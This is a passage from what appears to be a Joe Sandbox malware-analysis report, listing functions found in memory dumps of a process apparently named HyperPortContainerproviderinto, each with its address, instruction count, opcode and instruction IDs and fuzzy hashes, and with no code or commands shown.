                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b106030c51f7419b05180d1745944436f989320d9b4dd75b4d5d9014ee3c11f
                                                                          • Instruction ID: 6f3d82cf90a61457ca65b1460ebe60e78ace9943fe094c00020c56b7167e25bc
                                                                          • Opcode Fuzzy Hash: 4b106030c51f7419b05180d1745944436f989320d9b4dd75b4d5d9014ee3c11f
                                                                          • Instruction Fuzzy Hash: D1517BB1B0E44D4FE778DA5888765B43BDCFF96310B0602B9D09EC35B2DD2EAA068351
                                                                          Function 00007FFD9BEA3BBE Relevance: .2, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c3c5ef9a0d4c680a36da268798ea63f48e7d5bb76fcde9856706379a935e560b
                                                                          • Instruction ID: 46cb95f0f542b2caa6229d008d53ec1983159cae43e4c32c28fd1424662ab364
                                                                          • Opcode Fuzzy Hash: c3c5ef9a0d4c680a36da268798ea63f48e7d5bb76fcde9856706379a935e560b
                                                                          • Instruction Fuzzy Hash: B8715970A0EA4A8FE35ADB68C4A05B4BBA4FF05300F4545B9D04EC7AD7CB29B851C790
                                                                          Function 00007FFD9BEA8BAE Relevance: .2, Instructions: 209COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1964c254878b05bdb45a0841c549ea7701bb0f8a05d5ae6dcce4533f402b2f14
                                                                          • Instruction ID: 82d230be4d4b5762397e4e22c3dae37f661b57af0d2ecdbe092dafd44d15c894
                                                                          • Opcode Fuzzy Hash: 1964c254878b05bdb45a0841c549ea7701bb0f8a05d5ae6dcce4533f402b2f14
                                                                          • Instruction Fuzzy Hash: 6C713A70A0EA4E8FE759DF54C0A05B4BBA8FF15310F8541B9D04AC7AD7CB29B851C791
                                                                          Function 00007FFD9BEA9530 Relevance: .2, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4ec2a8af5d258a68e76ccb190fac4d69d2a1decf3dfdf2da5e712781885327bb
                                                                          • Instruction ID: 988d6f96c8838c69de7bfe216f898966f3edff717bc028d5920fd72883e88436
                                                                          • Opcode Fuzzy Hash: 4ec2a8af5d258a68e76ccb190fac4d69d2a1decf3dfdf2da5e712781885327bb
                                                                          • Instruction Fuzzy Hash: A8512660E1E55E8BEFBC975888796F877A9FF55300F0042FAD04EC71D6DE296A808B41
                                                                          Function 00007FFD9BEA16D5 Relevance: .2, Instructions: 162COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fcb8f92066e386f3f02ae2157aac48b11e4f466cd7f5f9d4b33cc015479ddb29
                                                                          • Instruction ID: 84d6f4baac5a5e3df3d7ea20ba28f1a11ef2e7044dc4305329e240470f4fe1f6
                                                                          • Opcode Fuzzy Hash: fcb8f92066e386f3f02ae2157aac48b11e4f466cd7f5f9d4b33cc015479ddb29
                                                                          • Instruction Fuzzy Hash: 28518DB0A0955D8FDBA9DB58C8A0BF9B7B4EF59300F1501BAD00ED32A1DA356A80CB41
                                                                          Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 28546e3177f105e633c09b2851bf6cf1d3c85b19d68884a2a34cf65e37a7cabb
                                                                          • Instruction ID: e5964567e3bb62d141693de632c424a259d42e71d4c74c886682f65e9bbda264
                                                                          • Opcode Fuzzy Hash: 28546e3177f105e633c09b2851bf6cf1d3c85b19d68884a2a34cf65e37a7cabb
                                                                          • Instruction Fuzzy Hash: C3412722B0C5290AE358F7BCA4A56FD7781DF9933AB0405BBE44ECB1D7DD18AD41C294
                                                                          Function 00007FFD9BEA5817 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da0fdef8b18f39470f40e3e56996931f703824c4e5080eb14eecf1586e36c983
                                                                          • Instruction ID: 9806039721892253ac0bdd16eefc626eb6ff8d5f28a5314753dadf424c71dc0e
                                                                          • Opcode Fuzzy Hash: da0fdef8b18f39470f40e3e56996931f703824c4e5080eb14eecf1586e36c983
                                                                          • Instruction Fuzzy Hash: 91415E3260D9488FDF98EF1CC4A5DB4B3E1FFA9320B0405AAD04EC7696DE25E855CB81
                                                                          Function 00007FFD9BEAA807 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2ba54b6978d53a818c001ce2d888c03dbd2609533d9c8281147bb224a703375
                                                                          • Instruction ID: 04566727207880ef84ee933e493b21c0dd001fa834685d87c27029b9d8b4cbe9
                                                                          • Opcode Fuzzy Hash: f2ba54b6978d53a818c001ce2d888c03dbd2609533d9c8281147bb224a703375
                                                                          • Instruction Fuzzy Hash: AD41743260DA098FDF98EF1CC4A5DB4B3E1FFA9320B14016AD04EC7292DE25E955CB41
                                                                          Function 00007FFD9BEA58C1 Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f42345dd147d745ed475c59d26d0a91ef7be8bbc7afa9a08f66327f7d5d96253
                                                                          • Instruction ID: 80d55fc531cff7932bd6880d19647e834ea59a94169a0a6c78f38229f2008973
                                                                          • Opcode Fuzzy Hash: f42345dd147d745ed475c59d26d0a91ef7be8bbc7afa9a08f66327f7d5d96253
                                                                          • Instruction Fuzzy Hash: DA316F3260D9488FDF98EF1CC4A5EA4B3E1FF6932070406A9D05EC7696DE25E845CB81
                                                                          Function 00007FFD9BEAA8B1 Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 89bd691bbb104f728a5ad24e8a411edbebfb42efebc1e21d3edd477e2848ceac
                                                                          • Instruction ID: 3cf075d1e303575c1854622c0b04b8c1eda28f9b603eb673d3c6cea01536a382
                                                                          • Opcode Fuzzy Hash: 89bd691bbb104f728a5ad24e8a411edbebfb42efebc1e21d3edd477e2848ceac
                                                                          • Instruction Fuzzy Hash: 3531923160CA488FDF9CEF1CC4A5D74B3E1FFA9314B1406AAD04AC72A2DE21E945CB81
                                                                          Function 00007FFD9BAA5A77 Relevance: .1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 35afa0f6e0ace425c73501a62905219a0f28a80633cf9e89661ffa9d37543d8e
                                                                          • Instruction ID: 4dc592ff43903a78346a06c65a3d0c3eddb27d4e740c42f92a78a2af3f17974a
                                                                          • Opcode Fuzzy Hash: 35afa0f6e0ace425c73501a62905219a0f28a80633cf9e89661ffa9d37543d8e
                                                                          • Instruction Fuzzy Hash: DA414830A0951D8FE7B9DB58C8A4BB973A2EB58314F1101B9D40ED32A1CE75AE818B54
                                                                          Function 00007FFD9BEA585B Relevance: .1, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 240c57e8fbaa7b6913cc2a229f342911d546e71a071624d6a7aedfc98b2cf865
                                                                          • Instruction ID: 230564af38da0e622586f55723ba4a09c1cbde4fb0e280e7ee2c5174f9208f29
                                                                          • Opcode Fuzzy Hash: 240c57e8fbaa7b6913cc2a229f342911d546e71a071624d6a7aedfc98b2cf865
                                                                          • Instruction Fuzzy Hash: E431607260D9498FDF98EF18C4A5EB4B3E1FF68320B0405A9D04EC7696DE25F885CB81
                                                                          Function 00007FFD9BEAA84B Relevance: .1, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b529cc90a711288a89cb6f6316706ba9f76d0577b9d695d335401adea7cd4102
                                                                          • Instruction ID: 08887dfe6cc2f81b1f698223ec13c562abfba2ba8b6f92e8e4bbafdf52dd10dc
                                                                          • Opcode Fuzzy Hash: b529cc90a711288a89cb6f6316706ba9f76d0577b9d695d335401adea7cd4102
                                                                          • Instruction Fuzzy Hash: E331643160CA098FDF98EF18C4A5DB4B7E1FF69310B1506AED04AC72A2DE25F945CB81
                                                                          Function 00007FFD9BEA0DA5 Relevance: .1, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 79964866621e199bf6272459339ac4476913992b57c6ef9259427e5d30307beb
                                                                          • Instruction ID: 9162dec432b49e478ad101d5f0a8196d37be69474b956b469ce1e8c43ce8333c
                                                                          • Opcode Fuzzy Hash: 79964866621e199bf6272459339ac4476913992b57c6ef9259427e5d30307beb
                                                                          • Instruction Fuzzy Hash: FF31CF71A0E68D8FDB56DBA488604AC7FB4FF16700B1501AAD08DDB1E3CA296D05C711
                                                                          Function 00007FFD9BEA5D8D Relevance: .1, Instructions: 112COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 85b2b549839889bfdc18a6be75d54c30996fcaf2de63c5e893dc0ee1f9deafed
                                                                          • Instruction ID: ae076cf0b949cab528e2968ffe620325ed5ccb00976129c3941be54f713a71f2
                                                                          • Opcode Fuzzy Hash: 85b2b549839889bfdc18a6be75d54c30996fcaf2de63c5e893dc0ee1f9deafed
                                                                          • Instruction Fuzzy Hash: 2D31F471E0E65E8FDB55CB94C8A09EDBBF4FF49300F0500BAD00AD71A2CB29A905CB00
                                                                          Function 00007FFD9BEA5625 Relevance: .1, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 403359e364c3db4b2365c2bf9d08c1ecf366dbd01f950e5c75d0529876fea067
                                                                          • Instruction ID: 2cf4505a253f6f033f004ebbb3c5796938fe787eaad01cb7b5148020ee097322
                                                                          • Opcode Fuzzy Hash: 403359e364c3db4b2365c2bf9d08c1ecf366dbd01f950e5c75d0529876fea067
                                                                          • Instruction Fuzzy Hash: 49313EB0E2E50ECFEB68DB9484615BD77F8FF84700F52017AE00ED21A1DB3A6A408B41
                                                                          Function 00007FFD9BEAA615 Relevance: .1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dfbef62ce127e7cafa9daeba378a5a8be274e4884f751f44a6307e544aa66aa1
                                                                          • Instruction ID: 2544b72c1098d691f9f4f606dfb154476499a7699d5eb0a6dca1cd0c997c6baf
                                                                          • Opcode Fuzzy Hash: dfbef62ce127e7cafa9daeba378a5a8be274e4884f751f44a6307e544aa66aa1
                                                                          • Instruction Fuzzy Hash: D0313EB0A1E64ECFDBB8DF9484615BD77B9FF84700F52217AD00EC21A1DA3A6A409F41
                                                                          Function 00007FFD9BEA2EC9 Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 580e3dfcdb6ec147b48ba5e72ab36434ae5e92d2c5c4a09dde5db92527a8451c
                                                                          • Instruction ID: ff1a683007effb80d0eff6ee7be91129ec9ce010a821ce7b8629ebcec34e85c4
                                                                          • Opcode Fuzzy Hash: 580e3dfcdb6ec147b48ba5e72ab36434ae5e92d2c5c4a09dde5db92527a8451c
                                                                          • Instruction Fuzzy Hash: B4219D93B1EACA0FD39AA7A84C345B17BD8EF1A22470442FBE09DC70E7DD056809C341
                                                                          Function 00007FFD9BAA0998 Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2c584f08c750c8496c54d9a4e34ef2e8f102e2ae192b5aff8080bcba34885374
                                                                          • Instruction ID: fca11e829bf7a26b3f4f4dd8563295af67eabda5615aa55035134c852e5ffd90
                                                                          • Opcode Fuzzy Hash: 2c584f08c750c8496c54d9a4e34ef2e8f102e2ae192b5aff8080bcba34885374
                                                                          • Instruction Fuzzy Hash: 7C212620B1D91D1FE798F77C946A6B972C7EB99325F0100BEE40EC33E6DD58AD418291
                                                                          Function 00007FFD9BEA7A45 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 100f31d1c278a0c86055728743de8a828ca693eb13aacea4f546ec509c192e89
                                                                          • Instruction ID: 5cd3df5a3561612557d8a5491ac3b7e2aa12e77dbd3dd2403c700f29247e444b
                                                                          • Opcode Fuzzy Hash: 100f31d1c278a0c86055728743de8a828ca693eb13aacea4f546ec509c192e89
                                                                          • Instruction Fuzzy Hash: 92212DB1F0EA0E4FEB68D79848762E8B7D9FF54310F150179D05DC32D2EE2969028385
                                                                          Function 00007FFD9BEA29B2 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d0a8bf55b2e93b02d0309485bc8cae9bc6556a4fb665f2a5efc6f1fc3ed2846
                                                                          • Instruction ID: ca827020e9046055de35b8357ab2794e53a3aa129cd9a7efcda860b9dc877021
                                                                          • Opcode Fuzzy Hash: 1d0a8bf55b2e93b02d0309485bc8cae9bc6556a4fb665f2a5efc6f1fc3ed2846
                                                                          • Instruction Fuzzy Hash: 46217371F1990E8FDB58EA98D8A29B8F7A5FF49710B118139E00ED3696DF257C12C780
                                                                          Function 00007FFD9BAA1171 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 50b9e0f8cd6b0c53331ba207e6a5b22ae9908fe046a65ffbd4ff7bcf6a438ba9
                                                                          • Instruction ID: 84807ac5c8329a4cbd801f49dc0e5addc4471e80444cb255ac4044c1e4fe1e59
                                                                          • Opcode Fuzzy Hash: 50b9e0f8cd6b0c53331ba207e6a5b22ae9908fe046a65ffbd4ff7bcf6a438ba9
                                                                          • Instruction Fuzzy Hash: DA31B530A0D64E8FDB55EB68C8649FD7BF1FF6A310B0505BBC009D71A2DB68A945CB50
                                                                          Function 00007FFD9BEA4510 Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f2ef46800623f9d3e795f3e477346587ee0a7528fc1306a7d15ffe20aa22adf
                                                                          • Instruction ID: 06c39eb17095ecde8617188780fa006cea859d6589b2c73800eb15fd6919cadc
                                                                          • Opcode Fuzzy Hash: 6f2ef46800623f9d3e795f3e477346587ee0a7528fc1306a7d15ffe20aa22adf
                                                                          • Instruction Fuzzy Hash: F4315951A1E5DA8BE73A825848705747BBDFF8231071A46BED0DB8B4E7C81DB982C742
                                                                          Function 00007FFD9BEA9500 Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2c985ee77cb3e8a9b62247e4c32d7bddcb056790a957dbad096c09c93dd85bba
                                                                          • Instruction ID: e1fab04956079638f02047d24445b5098a32812d940e59255731caddbfaa14d0
                                                                          • Opcode Fuzzy Hash: 2c985ee77cb3e8a9b62247e4c32d7bddcb056790a957dbad096c09c93dd85bba
                                                                          • Instruction Fuzzy Hash: EC315B50A1E19A8BEF398368847D5B47F5DFF4231071946BAD096CB0E7C81EF981C361
                                                                          Function 00007FFD9BEAE3E1 Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 331164c4b1966b661507616e5e552a2b1355f4da12964316fecb66e4e0482cc3
                                                                          • Instruction ID: afee332506eabc6707ec8e408b543c84d923a5747dd4d7e779424d42bef5127f
                                                                          • Opcode Fuzzy Hash: 331164c4b1966b661507616e5e552a2b1355f4da12964316fecb66e4e0482cc3
                                                                          • Instruction Fuzzy Hash: F2315950A1E5EF4AE33A829844715747F5DFF81311B294ABAE0CACB0E7C81DB981D341
                                                                          Function 00007FFD9BEA79A2 Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8b7f74cba6f2bc041c99f7f6b00ccaa104aa968f57cc51355c24620bfa99f323
                                                                          • Instruction ID: 16c21903d66bb0fd733fbb9739b1ba3fb4c14c893957b5a37a9f611003614385
                                                                          • Opcode Fuzzy Hash: 8b7f74cba6f2bc041c99f7f6b00ccaa104aa968f57cc51355c24620bfa99f323
                                                                          • Instruction Fuzzy Hash: 77217171F1990E9FDB59EA98D4A19B8F3A6FF58310B11413AD01ED3692CF24BD12C784
                                                                          Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 571eb6af68565748a0463a97a50925726848085c95b9fb356f34205c73b73108
                                                                          • Instruction ID: c1d74577e933382f40022de11080b8d461efa83ee913f785cdd33698ee875567
                                                                          • Opcode Fuzzy Hash: 571eb6af68565748a0463a97a50925726848085c95b9fb356f34205c73b73108
                                                                          • Instruction Fuzzy Hash: 58214B36F0D20E8AE731EBAC98511EC7B60EF81725F1545B7D01D8E1D3D978268686A8
                                                                          Function 00007FFD9BEA7EBD Relevance: .1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e9e5bbf17a6a79baceb439fa33961a2eb8af469f32a14da8b2c61f335c3b2485
                                                                          • Instruction ID: 3c2431444c0aa3352b92c00cc3c481e5b051ea3a3720a11a195b4097e1ba95c9
                                                                          • Opcode Fuzzy Hash: e9e5bbf17a6a79baceb439fa33961a2eb8af469f32a14da8b2c61f335c3b2485
                                                                          • Instruction Fuzzy Hash: D7217D9261FAC91FD796E7784C755617FA8EF1625470901FFD089C70E3ED052909C382
                                                                          Function 00007FFD9BEA1932 Relevance: .1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b361553bb005df4373d1944e35682f9b7d2cf6a0f2e98ac5ab0d8c42a155a15
                                                                          • Instruction ID: 2add20acc6ae7dc26292eac7564f060565b939d60a47e32fbb4e1f191b1bbc58
                                                                          • Opcode Fuzzy Hash: 0b361553bb005df4373d1944e35682f9b7d2cf6a0f2e98ac5ab0d8c42a155a15
                                                                          • Instruction Fuzzy Hash: 6F212971A0991C9FDF98DB58C8A5AECB3B1FF68310F0001AED00EE3291CA35AA41CB41
                                                                          Function 00007FFD9BEA6922 Relevance: .1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
